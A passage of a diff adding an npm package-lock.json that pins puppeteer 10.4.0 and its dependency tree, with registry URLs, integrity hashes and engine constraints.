"sha1-DTM+PwDqxQqhRUq9MO+MKl2ackI=", + "engines": { + "node": "*" + } + }, + "node_modules/chownr": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.4.tgz", + "integrity": "sha512-jJ0bqzaylmJtVnNgzTeSOs8DPavpbYgEr/b0YL8/2GO3xJEhInFmhKMUnEJQjZumK7KXGFhUy89PrsJWlakBVg==" + }, + "node_modules/concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" + }, + "node_modules/debug": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", + "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/devtools-protocol": { + "version": "0.0.901419", + "resolved": "https://registry.npmjs.org/devtools-protocol/-/devtools-protocol-0.0.901419.tgz", + "integrity": "sha512-4INMPwNm9XRpBukhNbF7OB6fNTTCaI8pzy/fXg0xQzAy5h3zL1P8xT3QazgKqBrb/hAYwIBizqDBZ7GtJE74QQ==" + }, + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "dependencies": { + "once": "^1.4.0" + } + }, + "node_modules/extract-zip": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extract-zip/-/extract-zip-2.0.1.tgz", + "integrity": "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==", + "dependencies": { + "debug": "^4.1.1", + "get-stream": "^5.1.0", + "yauzl": "^2.10.0" + }, + "bin": { + "extract-zip": "cli.js" + }, + "engines": { + "node": ">= 10.17.0" + }, + "optionalDependencies": { + "@types/yauzl": "^2.9.1" + } + }, + "node_modules/fd-slicer": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fd-slicer/-/fd-slicer-1.1.0.tgz", + "integrity": "sha1-JcfInLH5B3+IkbvmHY85Dq4lbx4=", + "dependencies": { + "pend": "~1.2.0" + } + }, + "node_modules/find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==" + }, + "node_modules/fs.realpath": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" + }, + "node_modules/get-stream": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz", + "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==", + "dependencies": { + "pump": "^3.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/glob": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.0.tgz", + "integrity": "sha512-lmLf6gtyrPq8tTjSmrO94wBeQbFR3HbLHbuyD69wuyQkImp2hWqMGB47OX65FBkPffO641IP9jWa1z4ivqG26Q==", + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.0.4", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/https-proxy-agent": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.0.tgz", + "integrity": "sha512-EkYm5BcKUGiduxzSt3Eppko+PiNWNEpa4ySk9vTC6wDsQJW9rHSa+UhGNJoRYp7bz6Ht1eaRIa6QaJqO5rCFbA==", + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/inflight": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", + "dependencies": { + "once": "^1.3.0", + "wrappy": "1" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + }, + "node_modules/locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dependencies": { + "p-locate": "^4.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/minimatch": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.4.tgz", + "integrity": "sha512-yJHVQEhyqPLUTgt9B83PXu6W3rx4MvvHvSUvToogpwoGDOUQ+yDrR0HRot+yOCdCO7u4hX3pWft6kWBBcqh0UA==", + "dependencies": { + "brace-expansion": "^1.1.7" + }, + "engines": { + "node": "*" + } + }, + "node_modules/minimist": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.5.tgz", + "integrity": "sha512-FM9nNUYrRBAELZQT3xeZQ7fmMOBg6nWNmJKTcgsJeaLstP/UODVpGsr5OhXhhXg6f+qtJ8uiZ+PUxkDWcgIXLw==" + }, + "node_modules/mkdirp": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.5.tgz", + "integrity": "sha512-NKmAlESf6jMGym1++R0Ra7wvhV+wFW63FaSOFPwRahvea0gMUcGUhVeAg/0BC0wiv9ih5NYPB1Wn1UEI1/L+xQ==", + "dependencies": { + "minimist": "^1.2.5" + }, + "bin": { + "mkdirp": "bin/cmd.js" + } + }, + "node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/node-fetch": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.1.tgz", + "integrity": "sha512-V4aYg89jEoVRxRb2fJdAg8FHvI7cEyYdVAh94HH0UIK8oJxUfkjlDQN9RbMx+bEjP7+ggMiFRprSti032Oipxw==", + "engines": { + "node": "4.x || >=6.0.0" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-locate": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dependencies": { + "p-limit": "^2.2.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/p-try": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", + "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/path-exists": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-is-absolute": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pend": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", + "integrity": "sha1-elfrVQpng/kRUzH89GY9XI4AelA=" + }, + "node_modules/pkg-dir": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", + "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "dependencies": { + "find-up": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/progress": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.1.tgz", + "integrity": "sha512-OE+a6vzqazc+K6LxJrX5UPyKFvGnL5CYmq2jFGNIBWHpc4QyE49/YOumcrpQFJpfejmvRtbJzgO1zPmMCqlbBg==", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/proxy-from-env": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", + "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" + }, + "node_modules/pump": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.0.tgz", + "integrity": "sha512-LwZy+p3SFs1Pytd/jYct4wpv49HiYCqd9Rlc5ZVdk0V+8Yzv6jR5Blk3TRmPL1ft69TxP0IMZGJ+WPFU2BFhww==", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/puppeteer": { + "version": "10.4.0", + "resolved": "https://registry.npmjs.org/puppeteer/-/puppeteer-10.4.0.tgz", + "integrity": "sha512-2cP8mBoqnu5gzAVpbZ0fRaobBWZM8GEUF4I1F6WbgHrKV/rz7SX8PG2wMymZgD0wo0UBlg2FBPNxlF/xlqW6+w==", + "hasInstallScript": true, + "dependencies": { + "debug": "4.3.1", + "devtools-protocol": "0.0.901419", + "extract-zip": "2.0.1", + "https-proxy-agent": "5.0.0", + "node-fetch": "2.6.1", + "pkg-dir": "4.2.0", + "progress": "2.0.1", + "proxy-from-env": "1.1.0", + "rimraf": "3.0.2", + "tar-fs": "2.0.0", + "unbzip2-stream": "1.3.3", + "ws": "7.4.6" + }, + "engines": { + "node": ">=10.18.1" + } + }, + "node_modules/readable-stream": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.0.tgz", + "integrity": "sha512-BViHy7LKeTz4oNnkcLJ+lVSL6vpiFeX6/d3oSH8zCW7UxP2onchk+vTGB143xuFjHS3deTgkKoXXymXqymiIdA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, + "node_modules/tar-fs": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-2.0.0.tgz", + "integrity": "sha512-vaY0obB6Om/fso8a8vakQBzwholQ7v5+uy+tF3Ozvxv1KNezmVQAiWtcNmMHFSFPqL3dJA8ha6gdtFbfX9mcxA==", + "dependencies": { + "chownr": "^1.1.1", + "mkdirp": "^0.5.1", + "pump": "^3.0.0", + "tar-stream": "^2.0.0" + } + }, + "node_modules/tar-stream": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "dependencies": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/through": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz", + "integrity": "sha1-DdTJ/6q8NXlgsbckEV1+Doai4fU=" + }, + "node_modules/unbzip2-stream": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/unbzip2-stream/-/unbzip2-stream-1.3.3.tgz", + "integrity": "sha512-fUlAF7U9Ah1Q6EieQ4x4zLNejrRvDWUYmxXUpN3uziFYCHapjWFaCAnreY9bGgxzaMCFAPPpYNng57CypwJVhg==", + "dependencies": { + "buffer": "^5.2.1", + "through": "^2.3.8" + } + }, + "node_modules/util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha1-RQ1Nyfpw3nMnYvvS1KKJgUGaDM8=" + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" + }, + "node_modules/ws": { + "version": "7.4.6", + "resolved": "https://registry.npmjs.org/ws/-/ws-7.4.6.tgz", + "integrity": "sha512-YmhHDO4MzaDLB+M9ym/mDA5z0naX8j7SIlT8f8z+I0VtzsRbekxEutHSme7NPS2qE8StCYQNUnfWdXta/Yu85A==", + "engines": { + "node": ">=8.3.0" + }, + "peerDependencies": { + "bufferutil": "^4.0.1", + "utf-8-validate": "^5.0.2" + }, + "peerDependenciesMeta": { + "bufferutil": { + "optional": true + }, + "utf-8-validate": { + "optional": true + } + } + }, + "node_modules/yauzl": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-2.10.0.tgz", + "integrity": "sha1-x+sXyT4RLLEIb6bY5R+wZnt5pfk=", + "dependencies": { + "buffer-crc32": "~0.2.3", + "fd-slicer": "~1.1.0" + } + } + }, + "dependencies": { + "@types/node": { + "version": "16.11.4", + "resolved": "https://registry.npmjs.org/@types/node/-/node-16.11.4.tgz", + "integrity": "sha512-TMgXmy0v2xWyuCSCJM6NCna2snndD8yvQF67J29ipdzMcsPa9u+o0tjF5+EQNdhcuZplYuouYqpc4zcd5I6amQ==", + "optional": true + }, + "@types/yauzl": { + "version": "2.9.2", + "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.9.2.tgz", + "integrity": "sha512-8uALY5LTvSuHgloDVUvWP3pIauILm+8/0pDMokuDYIoNsOkSwd5AiHBTSEJjKTDcZr5z8UpgOWZkxBF4iJftoA==", + "optional": true, + "requires": { + "@types/node": "*" + } + }, + "agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "requires": { + "debug": "4" + } + }, + "balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + }, + "base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==" + }, + "bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "requires": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "brace-expansion": { + "version": "1.1.11", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", + "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "requires": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "requires": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "buffer-crc32": { + "version": "0.2.13", + "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": "sha1-DTM+PwDqxQqhRUq9MO+MKl2ackI=" + }, + "chownr": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.4.tgz", + "integrity": "sha512-jJ0bqzaylmJtVnNgzTeSOs8DPavpbYgEr/b0YL8/2GO3xJEhInFmhKMUnEJQjZumK7KXGFhUy89PrsJWlakBVg==" + }, + "concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" + }, + "debug": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", + "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "requires": { + "ms": "2.1.2" + } + }, + "devtools-protocol": { + "version": "0.0.901419", + "resolved": "https://registry.npmjs.org/devtools-protocol/-/devtools-protocol-0.0.901419.tgz", + "integrity": "sha512-4INMPwNm9XRpBukhNbF7OB6fNTTCaI8pzy/fXg0xQzAy5h3zL1P8xT3QazgKqBrb/hAYwIBizqDBZ7GtJE74QQ==" + }, + "end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "requires": { + "once": "^1.4.0" + } + }, + "extract-zip": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extract-zip/-/extract-zip-2.0.1.tgz", + "integrity": "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==", + "requires": { + "@types/yauzl": "^2.9.1", + "debug": "^4.1.1", + "get-stream": "^5.1.0", + "yauzl": "^2.10.0" + } + }, + "fd-slicer": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fd-slicer/-/fd-slicer-1.1.0.tgz", + "integrity": "sha1-JcfInLH5B3+IkbvmHY85Dq4lbx4=", + "requires": { + "pend": "~1.2.0" + } + }, + "find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "requires": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + } + }, + "fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==" + }, + "fs.realpath": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" + }, + "get-stream": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz", + "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==", + "requires": { + "pump": "^3.0.0" + } + }, + "glob": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.0.tgz", + "integrity": "sha512-lmLf6gtyrPq8tTjSmrO94wBeQbFR3HbLHbuyD69wuyQkImp2hWqMGB47OX65FBkPffO641IP9jWa1z4ivqG26Q==", + "requires": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.0.4", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + } + }, + "https-proxy-agent": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.0.tgz", + "integrity": "sha512-EkYm5BcKUGiduxzSt3Eppko+PiNWNEpa4ySk9vTC6wDsQJW9rHSa+UhGNJoRYp7bz6Ht1eaRIa6QaJqO5rCFbA==", + "requires": { + "agent-base": "6", + "debug": "4" + } + }, + "ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==" + }, + "inflight": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", + "requires": { + "once": "^1.3.0", + "wrappy": "1" + } + }, + "inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + }, + "locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "requires": { + "p-locate": "^4.1.0" + } + }, + "minimatch": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.4.tgz", + "integrity": "sha512-yJHVQEhyqPLUTgt9B83PXu6W3rx4MvvHvSUvToogpwoGDOUQ+yDrR0HRot+yOCdCO7u4hX3pWft6kWBBcqh0UA==", + "requires": { + "brace-expansion": "^1.1.7" + } + }, + "minimist": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.5.tgz", + "integrity": "sha512-FM9nNUYrRBAELZQT3xeZQ7fmMOBg6nWNmJKTcgsJeaLstP/UODVpGsr5OhXhhXg6f+qtJ8uiZ+PUxkDWcgIXLw==" + }, + "mkdirp": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.5.tgz", + "integrity": "sha512-NKmAlESf6jMGym1++R0Ra7wvhV+wFW63FaSOFPwRahvea0gMUcGUhVeAg/0BC0wiv9ih5NYPB1Wn1UEI1/L+xQ==", + "requires": { + "minimist": "^1.2.5" + } + }, + "ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node-fetch": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.1.tgz", + "integrity": "sha512-V4aYg89jEoVRxRb2fJdAg8FHvI7cEyYdVAh94HH0UIK8oJxUfkjlDQN9RbMx+bEjP7+ggMiFRprSti032Oipxw==" + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", + "requires": { + "wrappy": "1" + } + }, + "p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "requires": { + "p-try": "^2.0.0" + } + }, + "p-locate": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "requires": { + "p-limit": "^2.2.0" + } + }, + "p-try": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", + "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==" + }, + "path-exists": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": 